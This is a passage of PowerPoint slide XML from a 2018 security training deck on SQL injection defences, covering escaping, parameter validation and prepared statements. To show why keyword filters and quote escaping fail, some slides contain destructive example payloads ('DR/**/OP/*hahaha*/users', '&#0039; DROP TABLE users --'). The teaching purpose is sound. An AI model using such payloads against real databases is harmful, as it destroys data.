          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12348297" y="-569523"/>
            <a:ext cx="12043612" cy="8421590"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="5400000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="10800000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="16200000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21596" h="21591" fill="norm" stroke="1" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="6699" y="1"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6621" y="-4"/>
                  <a:pt x="6546" y="13"/>
                  <a:pt x="6465" y="47"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6260" y="136"/>
                  <a:pt x="6217" y="191"/>
                  <a:pt x="5503" y="1280"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5136" y="1840"/>
                  <a:pt x="5116" y="1859"/>
                  <a:pt x="4547" y="2188"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4227" y="2373"/>
                  <a:pt x="3935" y="2560"/>
                  <a:pt x="3899" y="2603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3817" y="2700"/>
                  <a:pt x="3812" y="3078"/>
                  <a:pt x="3888" y="3316"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3939" y="3477"/>
                  <a:pt x="3926" y="3514"/>
                  <a:pt x="3713" y="3798"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3495" y="4088"/>
                  <a:pt x="3483" y="4121"/>
                  <a:pt x="3508" y="4385"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3540" y="4728"/>
                  <a:pt x="3535" y="4733"/>
                  <a:pt x="2894" y="4941"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2414" y="5096"/>
                  <a:pt x="1916" y="5401"/>
                  <a:pt x="1541" y="5770"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1432" y="5876"/>
                  <a:pt x="1285" y="5984"/>
                  <a:pt x="1213" y="6010"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1141" y="6036"/>
                  <a:pt x="979" y="6201"/>
                  <a:pt x="852" y="6377"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="648" y="6661"/>
                  <a:pt x="613" y="6757"/>
                  <a:pt x="542" y="7204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="444" y="7824"/>
                  <a:pt x="442" y="8108"/>
                  <a:pt x="532" y="8416"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="601" y="8655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="386" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="135" y="9046"/>
                  <a:pt x="54" y="9240"/>
                  <a:pt x="9" y="9743"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4" y="9808"/>
                  <a:pt x="1" y="9873"/>
                  <a:pt x="0" y="9940"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-4" y="10403"/>
                  <a:pt x="116" y="10894"/>
                  <a:pt x="322" y="11228"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="505" y="11525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375" y="11710"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="262" y="11872"/>
                  <a:pt x="246" y="11950"/>
                  <a:pt x="246" y="12329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="247" y="12950"/>
                  <a:pt x="403" y="13358"/>
                  <a:pt x="743" y="13632"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="884" y="13746"/>
                  <a:pt x="1068" y="13860"/>
                  <a:pt x="1152" y="13884"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1301" y="13928"/>
                  <a:pt x="1306" y="13939"/>
                  <a:pt x="1338" y="14402"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1379" y="14993"/>
                  <a:pt x="1463" y="15163"/>
                  <a:pt x="1863" y="15462"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2171" y="15692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2749" y="15658"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3067" y="15639"/>
                  <a:pt x="3500" y="15583"/>
                  <a:pt x="3712" y="15533"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4206" y="15416"/>
                  <a:pt x="4859" y="15416"/>
                  <a:pt x="5134" y="15532"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5252" y="15582"/>
                  <a:pt x="5543" y="15733"/>
                  <a:pt x="5782" y="15868"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6108" y="16052"/>
                  <a:pt x="6298" y="16116"/>
                  <a:pt x="6552" y="16128"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6738" y="16137"/>
                  <a:pt x="7095" y="16224"/>
                  <a:pt x="7347" y="16320"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8158" y="16633"/>
                  <a:pt x="9317" y="16682"/>
                  <a:pt x="10066" y="16435"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10342" y="16345"/>
                  <a:pt x="12448" y="16290"/>
                  <a:pt x="12522" y="16371"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12551" y="16404"/>
                  <a:pt x="12559" y="16636"/>
                  <a:pt x="12542" y="16964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12510" y="17591"/>
                  <a:pt x="12524" y="18778"/>
                  <a:pt x="12567" y="18969"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12593" y="19087"/>
                  <a:pt x="12664" y="19105"/>
                  <a:pt x="13252" y="19145"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13613" y="19170"/>
                  <a:pt x="14175" y="19191"/>
                  <a:pt x="14500" y="19191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14854" y="19191"/>
                  <a:pt x="15104" y="19219"/>
                  <a:pt x="15122" y="19261"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15139" y="19300"/>
                  <a:pt x="15151" y="19748"/>
                  <a:pt x="15148" y="20255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15146" y="20763"/>
                  <a:pt x="15164" y="21195"/>
                  <a:pt x="15188" y="21217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15213" y="21238"/>
                  <a:pt x="15998" y="21271"/>
                  <a:pt x="16934" y="21289"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18638" y="21322"/>
                  <a:pt x="20533" y="21429"/>
                  <a:pt x="21211" y="21529"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21410" y="21558"/>
                  <a:pt x="21577" y="21586"/>
                  <a:pt x="21584" y="21591"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21591" y="21596"/>
                  <a:pt x="21596" y="18205"/>
                  <a:pt x="21596" y="14056"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21596" y="6513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20958" y="6556"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20608" y="6581"/>
                  <a:pt x="19920" y="6645"/>
                  <a:pt x="19430" y="6700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18940" y="6755"/>
                  <a:pt x="18398" y="6815"/>
                  <a:pt x="18226" y="6834"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17293" y="6938"/>
                  <a:pt x="15618" y="7072"/>
                  <a:pt x="15262" y="7072"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14875" y="7072"/>
                  <a:pt x="14851" y="7081"/>
                  <a:pt x="14810" y="7238"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14770" y="7386"/>
                  <a:pt x="14727" y="7409"/>
                  <a:pt x="14403" y="7453"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14204" y="7480"/>
                  <a:pt x="13801" y="7486"/>
                  <a:pt x="13509" y="7467"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13025" y="7435"/>
                  <a:pt x="12972" y="7443"/>
                  <a:pt x="12929" y="7560"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12882" y="7684"/>
                  <a:pt x="12875" y="7684"/>
                  <a:pt x="12701" y="7546"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12083" y="7057"/>
                  <a:pt x="11323" y="5869"/>
                  <a:pt x="10524" y="4146"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10173" y="3389"/>
                  <a:pt x="9829" y="2682"/>
                  <a:pt x="9760" y="2575"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9690" y="2468"/>
                  <a:pt x="9341" y="2165"/>
                  <a:pt x="8983" y="1903"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8596" y="1620"/>
                  <a:pt x="8085" y="1167"/>
                  <a:pt x="7719" y="782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7192" y="228"/>
                  <a:pt x="6932" y="15"/>
                  <a:pt x="6699" y="1"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="607" name="Time-Based"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Time-Based</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="608"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60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610" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="611"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Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-44054" y="9376378"/>
            <a:ext cx="24632977" cy="1428338"/>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616" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-162587" y="5639082"/>
            <a:ext cx="24632976" cy="1428339"/>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617" name="Escaping?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Escaping?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="618"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61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620" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="621" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="622" name="Can’t you just look for keywords like DROP?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3137501" y="4134190"/>
            <a:ext cx="14606675"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5800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Can’t you just look for keywords like DROP?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="623" name="DR/**/OP/*hahaha*/users"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8369957" y="5888114"/>
            <a:ext cx="7644086"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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>DR</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/**/</a:t>
            </a:r>
            <a:r>
              <a:t>OP</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/*hahaha*/</a:t>
            </a:r>
            <a:r>
              <a:t>users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="624" name="Can’t you just escape all quotes?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3137501" y="8039397"/>
            <a:ext cx="10965756"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5800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Can’t you just escape all quotes?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="625" name="&amp;#0039; DROP TABLE users --"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7525593" y="9625409"/>
            <a:ext cx="9332814"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>&amp;#0039; DROP TABLE users --</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Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-69305" y="9376378"/>
            <a:ext cx="24446411" cy="1428338"/>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630" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-69303" y="5639082"/>
            <a:ext cx="24446408" cy="1428339"/>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631" name="Parameter Validation?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Parameter Validation?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="632"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63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634" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="635" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="If integer field, use only integers,"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3184281" y="4134189"/>
            <a:ext cx="15094587" cy="1031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5800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If integer field, use only integers,</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637" name="WHERE id=#{str.gsub(/[^0-9]/, '')}"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5793816" y="5888114"/>
            <a:ext cx="9875516"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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:t> id=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>#{str.gsub(/[^0-9]/, '')}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="638" name="If alphanumeric field, use only alphanums,"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3184281" y="8020811"/>
            <a:ext cx="14117887"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5800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If alphanumeric field, use only alphanums, </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="639" name="WHERE name=#{str.gsub(/[^0-9a-z ]/i, '')}"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6061459" y="9625409"/>
            <a:ext cx="12261082"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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:t> name=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>#{str.gsub(/[^0-9a-z ]/i, '')}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="640" name="What about foreign names, or names with hyphens in them?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15496671" y="12407674"/>
            <a:ext cx="696188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2000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>What about foreign names, or names with hyphens in them? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="641" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="15667771" y="11115706"/>
            <a:ext cx="721923" cy="1113696"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="BABCBB"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:p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5"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646"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647" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="648" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="649" name="Use Prepared Statements"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Use Prepared Statements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="650" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</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Prepared Statements?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Prepared Statements?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655" name="An SQL statement template.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>An SQL statement template.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Constant values are substituted during each execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Bonus: Can also improve performance!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="656"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657"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658" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="659" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="660" name="https://en.wikipedia.org/wiki/Prepared_statement"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
